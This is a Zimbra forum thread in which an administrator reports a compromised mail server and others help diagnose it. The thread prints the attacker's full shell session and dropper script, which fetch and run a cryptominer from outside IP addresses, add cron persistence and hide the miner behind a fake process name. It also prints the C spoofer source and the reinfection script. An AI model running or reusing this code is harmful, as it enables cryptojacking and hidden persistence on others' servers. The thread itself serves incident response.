
Thread: "Zimbra Account" Being Hacked and creating new admin account

  1. #1
    ettorebb is offline Junior Member

"Zimbra Account" Being Hacked and creating new admin account

    Guys,

I'm having some trouble with my Zimbra server: my `zimbra` SSH account was compromised. This is a legacy server, so I don't know whether an exploit was already installed on it before this.

I'm seeing these entries in my audit.log (admin SOAP logins on port 7071 as the `zimbra` account from the attacker's IP, followed by a new account being created and an existing one being made an admin):

    2014-03-10 10:25:26,926 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=AdminAuth; account=zimbra;
    2014-03-10 10:25:26,968 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=Auth; account=zimbra; protocol=soap;
    2014-03-10 10:25:29,938 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=CreateAccount; name=newadmin@mydomain.com.br;
    2014-03-10 10:25:31,628 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=ModifyAccount; name=operator01@mydomain.com.br; zimbraIsAdminAccount=TRUE;

I also discovered that the attacker ran these commands:

    # Attacker's shell session as reconstructed by the poster. The /opt/zimbra paths
    # suggest it ran as the zimbra user -- presumably; confirm from the auth/wtmp logs.
    # Recon of the deployed zimlets, then kill earlier miner instances (a, b, minerd32
    # and minerd64 are the same process names the zmb script below kills).
    ls -la /opt/zimbra/zimlets-deployed;rm -rf /var/tmp/*;killall -9 a;killall -9 b;killall -9 minerd32;killall -9 minerd64
    # Plant read-only, immutable (+i) empty files named a and b in /var/tmp.
    # NOTE(review): chattr +i needs CAP_LINUX_IMMUTABLE; if these calls succeeded,
    # the session had more than the zimbra user's privileges -- worth checking.
    cd /var/tmp;touch a;touch b;chmod 444 a;chmod 444 b;chattr +isa a b;chattr +ia a
    # "freshclam" is the name the zmb script gives its miner binary (wget ... -O
    # freshclam), i.e. an earlier install of the same payload, not ClamAV's updater.
    killall -9 freshclam
    ps x
    # Stage 2: fetch the zmb dropper (quoted in full below), run it, remove traces.
    wget 212.227.137.251/img/common/zmb && sh zmb;rm -rf zmb;rm -rf /var/tmp/*
    # Check that the miner's pool configuration (...a15, the JSON quoted in post #2)
    # was fetched.
    cat /opt/zimbra/docs/idnmulti.txt/9cdfb439c7876e703e307864c9167a15


And this is the script (`zmb`) that the wget above fetches:

    #!/bin/sh
    # "zmb": second-stage dropper fetched by the attacker's session above. It installs
    # a cpuminer ("minerd") under a fake process name, adds cron persistence, removes
    # the zimlets that look like the entry point, and deletes itself.
    # Keep this session out of the shell history.
    unset HISTFILE;unset SAVEHIST
    # 32 or 64: selects which prebuilt binaries are downloaded below (xh$bit, minerd$bit).
    bit=`getconf LONG_BIT`
    # Kill previous copies of this payload and competing miners (a, b, minerd*, kpoll,
    # dsys) and delete their leftovers from the usual temp directories.
    killall -9 a b minerd64 minerd32
    killall -9 a b minerd64 minerd32
    kill -9 `pidof minerd64`;kill -9 `pidof b`;ls -la /var/tmp /dev/shm /tmp;rm -rf /var/tmp/a /var/tmp/b /var/tmp/xd.pl /var/tmp/_tmp39* /var/tmp/miner*
    kill -9 `pidof minerd32`;kill -9 `pidof a`
    kill -9 `pidof kpoll`;kill -9 `pidof dsys`
    killall -9 kpoll dsys
    rm -rf /tmp/kpoll*
    rm -rf /tmp/dsys*
    # Hide the payload in /opt/zimbra/docs/idnmulti.txt/ -- a directory named like a
    # file -- and copy the real docs into it so a casual listing looks legitimate.
    mkdir /opt/zimbra/docs
    mkdir /opt/zimbra/docs/idnmulti.txt
    cp -f /opt/zimbra/docs/* /opt/zimbra/docs/idnmulti.txt
    cd /opt/zimbra/docs/idnmulti.txt
    # Marker files 9cdfb439...a10 .. a29 containing "1" or "0". Their purpose is not
    # evident from this script; ...a15 (the gap in the sequence) is the miner's pool
    # config fetched further down. Treat every file in this directory as an IOC.
    echo "1">>9cdfb439c7876e703e307864c9167a10
    echo "1">>9cdfb439c7876e703e307864c9167a11
    echo "1">>9cdfb439c7876e703e307864c9167a12
    echo "1">>9cdfb439c7876e703e307864c9167a13
    echo "1">>9cdfb439c7876e703e307864c9167a14
    echo "1">>9cdfb439c7876e703e307864c9167a16
    echo "1">>9cdfb439c7876e703e307864c9167a17
    echo "1">>9cdfb439c7876e703e307864c9167a18
    echo "1">>9cdfb439c7876e703e307864c9167a19
    echo "1">>9cdfb439c7876e703e307864c9167a20
    echo "1">>9cdfb439c7876e703e307864c9167a21
    echo "1">>9cdfb439c7876e703e307864c9167a22
    echo "1">>9cdfb439c7876e703e307864c9167a23
    echo "0">>9cdfb439c7876e703e307864c9167a24
    echo "0">>9cdfb439c7876e703e307864c9167a25
    # The tail of the next line also downloads: xh$bit -> x (prebuilt process-name
    # spoofer/daemonizer, source quoted as xh.c in post #2), xh.c -> x.c, and
    # minerd$bit -> "freshclam" (the miner, named after ClamAV's updater).
    echo "0">>9cdfb439c7876e703e307864c9167a26;echo "0">>9cdfb439c7876e703e307864c9167a27;echo "0">>9cdfb439c7876e703e307864c9167a28;echo "0">>9cdfb439c7876e703e307864c9167a29;wget 212.227.137.251/img/common/top_box.jpg/xh$bit -O x;wget 212.227.137.251/img/common/top_box.jpg/xh.c -O x.c;wget 212.227.137.251/img/common/top_box.jpg/minerd$bit -O freshclam

    # Alternate config host, disabled by the author.
    #wget 188.165.237.153/downloads/9cdfb439c7876e703e307864c9167a15 -O 9cdfb439c7876e703e307864c9167a15
    # Miner config: JSON with the stratum pool URL, worker name and password (post #2).
    cd /opt/zimbra/docs/idnmulti.txt/;wget 84.19.183.3/img/common/9cdfb439c7876e703e307864c9167a15 -O 9cdfb439c7876e703e307864c9167a15

    # Build x from source and launch the miner through it. Per xh.c: -s sets the fake
    # argv[0] "amavisd (ch6-avail)", -d daemonizes (double fork + setsid, fds to
    # /dev/null); option parsing stops at ./freshclam, so the remaining
    # -c/-s/-R/-q/-B flags are the miner's own (-c = the pool config file above).
    # Result: ps shows "amavisd (ch6-avail)", not minerd; /proc/<pid>/exe still
    # points at ./freshclam, which is how to spot it.
    chmod 755 *;chmod +x *;gcc -o x x.c;./x -s "amavisd (ch6-avail)" -d ./freshclam -c 9cdfb439c7876e703e307864c9167a15 -s 3 -R 5 -q -B >/dev/null 2>&1
    rm -rf x.c

    # Persistence 1: append a per-minute zmbd job to the current user's crontab.
    # Existing entries are kept, so `crontab -l` as that user will show the extra line.
    crontab -l>cron.d
    echo "* * * * * /opt/zimbra/docs/idnmulti.txt/zmbd >/dev/null 2>&1" >> cron.d
    crontab cron.d
    crontab -l | grep zmbd
    # zmbd (quoted in post #2) re-fetches and re-runs this script.
    wget 212.227.137.251/img/common/zmbd -O zmbd >> /dev/null &&
    chmod u+x zmbd
    # Persistence 2: also drop zmbd into /etc/cron.hourly. Writing there needs root;
    # whether this succeeded tells you what privileges the attacker actually had.
    rm -rf /etc/cron.hourly/update
    cp zmbd /etc/cron.hourly/
    #chattr -ia bash
    #chattr -ia *

    # Undeploy and delete the zimlets that look like the entry point (the JSP-based
    # example zimlets and com_zimbra_pwn), including their compiled JSP classes --
    # presumably so other attackers cannot reuse the same hole. NOTE(review): this
    # also destroys evidence; image the box before cleaning if forensics matter.
    /opt/zimbra/bin/zmzimletctl undeploy com_zimbra_example_simplejspaction
    /opt/zimbra/bin/zmzimletctl undeploy com_zimbra_example_simplejspaction2
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_pwn
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_example_simplejspaction2
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_example_simplejspaction
    rm -rf /opt/zimbra/jetty/work/zimlet/jsp/org/apache/jsp/com_005fzimbra_005fexample_005fsimplejspaction
    rm -rf /opt/zimbra/jetty/work/zimlet/jsp/org/apache/jsp/com_005fzimbra_005fexample_005fsimplejspaction2

    # Restart mailboxd so the undeploy takes effect; both control-script spellings are
    # tried, presumably to cover different ZCS versions.
    /opt/zimbra/bin/zmmailboxctl restart >/dev/null 2>&1;/opt/zimbra/bin/zmmailboxdctl restart >/dev/null 2>&1


    # Also remove com_zimbra_email_dns -- possibly a rival's zimlet; not verifiable here.
    ls -la /opt/zimbra/zimlets-deployed/com_zimbra_email_dns;rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_email_dns

    # Self-delete: the copy in the hide directory and the script being executed.
    rm -rf /opt/zimbra/docs/idnmulti.txt/zmb
    rm -rf $0


I know he installed something here, but I just don't know what it is.

    Please help me!

  2. #2
    Wasowski is offline Senior Member


You are now mining cryptocurrency for him: the script downloads a `minerd` binary (saved as `freshclam`) plus a stratum pool config, launches it under the fake process name `amavisd (ch6-avail)`, and installs cron jobs that re-run the dropper.



    http://212.227.137.251/img/common/top_box.jpg/xh.c
    /*
    EXPERiMENTAL FOR ALL NEWBS. STFU + BYE.. KTHX.
    */

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <string.h>
    #include <fcntl.h>
    #include <pwd.h>
    #include <grp.h>

    void usage(char *progname);

    /*
     * changeown: parse "user[:group]" (login/group names, falling back to
     * numeric ids via atoi) and switch the calling process to that identity,
     * setgid() first and setuid() second. Backs the -u option in main().
     * Returns 1 on success, 0 if either set*id() call fails (main() ignores
     * the result). Only meaningful when the caller is root.
     *
     * NOTE(review): defects visible in this function --
     *  - strncpy(user, str, sizeof(user)) leaves `user` unterminated when str
     *    is 256 bytes or longer; the memset only covers shorter input;
     *  - `gid` is never assigned when getpwnam() fails and no ":group" suffix
     *    is present, so setgid() is called with an indeterminate value;
     *  - atoi() is used without <stdlib.h> (implicit declaration).
     * The invocation seen on the compromised server (the ./x line in post #1)
     * does not use -u, so this path was not exercised there.
     */
    int changeown (char *str)

    {

    char user[256], *group;
    struct passwd *pwd;
    struct group *grp;

    uid_t uid;
    gid_t gid;



    /* Private copy of the argument so it can be split in place. */
    memset(user, '\0', sizeof(user));
    strncpy(user, str, sizeof(user));



    /* Split at the first ':'. Afterwards `group` points at the group part,
     * or at the terminating NUL when there is none. */
    for (group = user; *group; group++)

    if (*group == ':')

    {

    *group = '\0';
    group++;
    break;

    }



    /* Name lookup first (assignment inside the condition is the author's
     * style), numeric uid as fallback. Only the passwd branch sets gid. */
    if (pwd = getpwnam(user))

    {

    uid = pwd->pw_uid;
    gid = pwd->pw_gid;

    } else uid = (uid_t) atoi(user);



    /* An explicit group overrides the passwd primary group. */
    if (*group)

    if (grp = getgrnam(group)) gid = grp->gr_gid;
    else gid = (gid_t) atoi(group);



    /* Group before user: once the uid is unprivileged, setgid() would fail. */
    if (setgid(gid)) {

    perror("XXX Err0r: Can't set 31337 GiD");
    return 0;

    }



    if (setuid(uid))

    {

    perror("XXX Err0r: Can't set 31337 UiD");
    return 0;

    }



    return 1;



    }



    /*
     * fullpath: resolve the executable that main() hands to execv().
     *  - cmd starting with '/': returned unchanged (the caller's own pointer,
     *    not a fresh allocation);
     *  - cmd starting with '.': current directory + "/" + cmd;
     *  - otherwise: the first $PATH entry holding a regular file named cmd
     *    with any execute bit set.
     * Returns NULL when nothing matches (after freeing the buffer) or when
     * getcwd() fails. Non-absolute results live in a 256-byte malloc'd buffer
     * the caller never frees -- it execs right afterwards.
     *
     * NOTE(review): defects visible in this function --
     *  - malloc() is unchecked and, like free(), undeclared (<stdlib.h> is
     *    not included);
     *  - the '.' branch strcat()s onto a 255-byte getcwd() result with no
     *    bounds check, so a long cwd plus cmd overflows `filename`;
     *  - the $PATH walk writes '\0' over each ':' in the string returned by
     *    getenv(), truncating the process's own PATH in place; the exec'd
     *    program inherits that truncated environment.
     */
    char *fullpath(char *cmd)

    {

    char *p, *q, *filename;
    struct stat st;



    if (*cmd == '/')

    return cmd;



    filename = (char *) malloc(256);

    /* "./freshclam" in the observed invocation takes this branch. */
    if (*cmd == '.')

    if (getcwd(filename, 255) != NULL)

    {

    strcat(filename, "/");
    strcat(filename, cmd);
    return filename;

    }

    else

    return NULL;



    /* Walk PATH entry by entry, splitting the string in place (see note above). */
    for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q)

    {

    if (q = (char *) strchr(q, ':'))
    *q = (char) '\0';



    snprintf(filename, 256, "%s/%s", p, cmd);


    /* First regular file with any execute bit wins -- not necessarily one
     * executable by this user. */
    if (stat(filename, &st) != -1
    && S_ISREG(st.st_mode)
    && (st.st_mode&S_IXUSR || st.st_mode&S_IXGRP || st.st_mode&S_IXOTH))

    return filename;



    if (q == NULL)

    break;

    }



    free(filename);

    return NULL;

    }

    /*
     * usage: print the option summary to stderr and exit(1). The text is kept
     * verbatim -- the banter is part of the sample and useful for attribution
     * and signature work. Decoded:
     *   -s NAME       fake argv[0] shown by ps (required, see main());
     *   -d            daemonize (double fork, setsid, fds to /dev/null);
     *   -u uid[:gid]  change identity first (see changeown());
     *   -p FILE       write the daemon's pid to FILE.
     * The example line shows the intended use: make a process look like
     * "/sbin/mingetty tty2". exit() is used without <stdlib.h>.
     */
    void
    usage(char *progname)

    {

    fprintf(stderr, "well it could be just another system update mr admin "
    "sweet successfull researching (c) 2008\n\nwe have some superi0r options ahead:\n"

    "-s ***\tSexual procedure\n"
    "-d\t\tRun a jew as a daemon/system/slave (opti0nal in iraq)\n"
    "-u uid[:gid]\tWe could even Change UiD/GiD, use another user. maybe for apaches (opti0nal in arabia)\n"
    "-p filename\tLamely Save PiD to filename (universally optional)\n\n"

    "We give you examples: %s -s \"/sbin/mingetty tty2\" -d -p well.31337 ./bad bad.idea\n\n",progname);

    exit(1);

    }





    /*
     * main: argv spoofer + daemonizer. Options are parsed up to the first
     * argument that does not start with '-': -s NAME fake argv[0]; -d
     * daemonize; -u uid[:gid] switch identity (applied immediately, during
     * parsing); -p FILE write the pid. Everything from that first non-option
     * on is the real command line. Its argv[0] is replaced by NAME (padded
     * with spaces to 255 characters when further arguments follow --
     * presumably so the real arguments sit far to the right in ps output),
     * the real executable is resolved with fullpath() and passed to execv().
     * So `ps` shows NAME while /proc/<pid>/exe still names the real binary;
     * that is the check to run on a suspect process.
     *
     * NOTE(review): defects visible in this function --
     *  - fakename and pidfile are never initialised, yet are compared with
     *    NULL (works only by accident);
     *  - argv[++i] after -s/-u/-p is not bounds-checked, so a trailing option
     *    dereferences argv[argc];
     *  - newargv is allocated as n*sizeof(char**)+1 bytes, one pointer short
     *    of the n+1 slots written (newargv[n] = NULL lands past the block),
     *    and the malloc() result is unchecked;
     *  - strncpy(fake, fakename, strlen(fakename)) has no bound tied to
     *    sizeof fake, so a NAME longer than 255 bytes overflows it;
     *  - waitpid() is called without <sys/wait.h>; no child exists at that
     *    point, so it merely returns -1.
     */
    int main(int argc,char **argv)

    {

    char c;
    char fake[256];
    char *progname, *fakename;
    char *pidfile, *fp;
    char *execst;

    FILE *f;

    int runsys=0, null;
    int j,i,n,pidnum;
    char **newargv;



    progname = argv[0];
    if(argc<2) usage(progname);



    /* Option loop; `else break` leaves i at the first real argument. */
    for (i = 1; i < argc; i++)

    {

    if (argv[i][0] == '-')

    switch (c = argv[i][1])

    {

    case 's': fakename = argv[++i]; break;
    case 'u': changeown(argv[++i]); break;
    case 'p': pidfile = argv[++i]; break;
    case 'd': runsys = 1; break;

    default: usage(progname); break;

    }

    else break;

    }



    /* n = number of real arguments; a fake name is mandatory. */
    if (!(n = argc - i) || fakename == NULL) usage(progname);



    /* NOTE(review): should be (n + 1) * sizeof *newargv; see header comment. */
    newargv = (char **) malloc(n * sizeof(char **) + 1);
    for (j = 0; j < n; i++,j++) newargv[j] = argv[i];
    newargv[j] = NULL;



    /* Resolve the real binary before argv[0] is overwritten. */
    if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); }
    execst = fp;

    /* The spoof itself: the kernel keeps the real path for exec, ps shows
     * whatever argv[0] says. */
    if (n > 1)

    {

    memset(fake, ' ', sizeof(fake) - 1);
    fake[sizeof(fake) - 1] = '\0';
    strncpy(fake, fakename, strlen(fakename));
    newargv[0] = fake;

    }

    else newargv[0] = fakename;


    /* -d: classic double fork. The parent returns at once, the first child
     * setsid()s, forks again and returns; the grandchild continues with
     * stdin/stdout/stderr on /dev/null. The `null` descriptor itself is never
     * closed, so the daemon keeps an extra /dev/null fd open. */
    if (runsys)

    {

    if ((null = open("/dev/null", O_RDWR)) == -1)

    {

    perror("XXX Err0r: /dev/null");
    return -1;

    }



    switch (fork())

    {

    case -1:

    perror("XXX Err0r: F0RK-1");
    return -1;

    case 0:

    setsid();
    switch (fork())

    {

    case -1:

    perror("XXX Err0r: F0RK-2");
    return -1;

    case 0:

    umask(0);
    close(0);
    close(1);
    close(2);
    dup2(null, 0);
    dup2(null, 1);
    dup2(null, 2);

    break;

    default:

    return 0;

    }

    break;
    default:
    return 0;

    }

    }



    /* No child to wait for here (the children are the ones that got this
     * far); returns -1 immediately. Needs <sys/wait.h>. */
    waitpid(-1, (int *)0, 0);

    pidnum = getpid();



    /* -p: optional pid file; `pidfile` is uninitialised when -p was absent. */
    if (pidfile != NULL && (f = fopen(pidfile, "w")) != NULL)

    {

    fprintf(f, "%d\n", pidnum);
    fclose(f);

    }



    /* Goes to /dev/null in daemon mode. execv() keeps the real path but the
     * spoofed argv; reached only if exec fails. */
    fprintf(stderr,"==> Elitename: %s PiDJews: %d\n",fakename,pidnum);
    execv(execst, newargv);
    perror("WTFuX... We Couldnt exekute.. we are not r00t or n0t cyute?");
    return -1;

    }

    ------------------------
    http://188.165.237.153/downloads/9cd...307864c9167a15
    {
    "url" : "stratum+tcp://pool1.us.multipool.us:7777",
    "user" : "parCore.80",
    "pass" : "xXx"
    }

    ----------------
    http://84.19.183.3/img/common/9cdfb4...307864c9167a15
    {
    "url" : "stratum+tcp://mnt.coins4everyone.com:3445",
    "user" : "parCore.good",
    "pass" : "xXx"
    }




    ------------

    http://212.227.137.251/img/common/zmbd

    #!/bin/sh
    # "zmbd": the job the dropper installs in the per-minute user crontab and in
    # /etc/cron.hourly. It looks for the miner under its fake name: the PID of any
    # process whose `ps x` line contains "ch6-avail" (the -s name from the zmb script).
    # NOTE(review): the branches are the reverse of a watchdog -- when the miner IS
    # running it re-fetches zmb and re-runs it (zmb kills the miner and reinstalls, so
    # this is an update/reinfect loop); when the miner is NOT running it only prints a
    # string and does not restart it. Killing the "amavisd (ch6-avail)" process and
    # removing both cron entries is therefore enough to stop this loop.
    zmbpro=`ps x|grep ch6-avail|grep -v grep|awk '{print $1}'`
    if [ "$zmbpro" != "" ]
    then nohup wget 212.227.137.251/img/common/zmb && sh zmb >> /dev/null &
    else
    echo "MERGE!!!"

    fi

  3. #3
    Wasowski is offline Senior Member


    maybe more infos here: Zimbra hack

    and here: zimbra 0-day

    PS: I tried to use pastebin but it doesnt seems to work here, any reason ? Thanks.

  4. #4
    ettorebb is offline Junior Member


    Quote Originally Posted by Wasowski View Post
    maybe more infos here: Zimbra hack

    and here: zimbra 0-day - Page 3

    PS: I tried to use pastebin but it doesnt seems to work here, any reason ? Thanks.
    TKS!

I can't find any process named "minerd64" or "minerd32". How could I stop it and, more importantly, how can I block this intrusion, given that it happened even with a strong password (18 chars, uppercase, special chars, numbers etc.)?

  5. #5
    phoenix is online now Zimbra Consultant & Moderator


    You should always provide the exact version of ZCS that's in use by posting the output of the following command:

    Code:
    zmcontrol -v
    Quote Originally Posted by ettorebb View Post
I can't find any process named "minerd64" or "minerd32". How could I stop it and, more importantly, how can I block this intrusion, given that it happened even with a strong password (18 chars, uppercase, special chars, numbers etc.)?
    If you're not on a current version of ZCS then I suggest you get your system upgraded as soon as possible: Urgency on Security Fixes for Bug 80338 and Bug 84547
    Regards


    Bill



  6. #6
    ettorebb is offline Junior Member


    Quote Originally Posted by phoenix View Post
    You should always provide the exact version of ZCS that's in use by posting the output of the following command:

    Code:
    zmcontrol -v
    If you're not on a current version of ZCS then I suggest you get your system upgraded as soon as possible: Urgency on Security Fixes for Bug 80338 and Bug 84547
Thanks Bill, I'm on an outdated version (Release 7.1.4_GA_2555.UBUNTU8 UBUNTU8 FOSS edition) and I'm arranging the update ASAP, probably on Saturday the 15th.

When I've updated the server I will report back on the situation!

    Best regards!

  7. #7
    Wasowski is offline Senior Member


    Quote Originally Posted by ettorebb View Post
    TKS!

How can I block this intrusion, given that it happened even with a strong password (18 chars, uppercase, special chars, numbers etc.)?
Are you the only one who knows that password? Have you written the password down in a file or on paper?
You may have a keylogger on one of the machines you SSH in from.

If you see thousands of failed logins a day you might want to use fail2ban, but I doubt brute force is how they got into your server.

Edit: And if you can't find the process, maybe the installation script failed. Note, though, that the script starts the miner through `x` with `-s "amavisd (ch6-avail)"`, which replaces argv[0], so it will never show up in `ps` as `minerd`; look for a process named `amavisd (ch6-avail)` (the `zmbd` cron job greps for `ch6-avail`) and check where its `/proc/<pid>/exe` link points.
    Last edited by Wasowski; 03-11-2014 at 08:47 AM.

  8. #8
    ettorebb is offline Junior Member


Thanks to Bill I found the script used for creating the accounts: Zimbra - 0day exploit / Privilege escalation via LFI

I am 100% sure that nobody else has my password, and I only access the server from a freshly installed BackTrack machine that I consider secure.

I'll set up fail2ban just in case.

I haven't written my password down anywhere other than in my head. Anyway, I've changed my password, and I'll update the server this weekend and post the results. Thanks again for your attention!

    best regards!
    Last edited by ettorebb; 03-13-2014 at 06:26 AM.

  9. #9
    ettorebb is offline Junior Member


    Guys,

I've updated to Release 7.2.6_GA_2926.UBUNTU8 UBUNTU8 FOSS edition, and everything is fine now. [Editor's note: the upgrade only closes the entry point; the admin account the attacker created, the `zimbraIsAdminAccount=TRUE` change, the `zmbd` crontab and cron.hourly entries, and the files under `/opt/zimbra/docs/idnmulti.txt/` still have to be removed by hand.]

I've tested some exploits against my server and none of them worked.

    Thanks for everyone,

    Best regards.
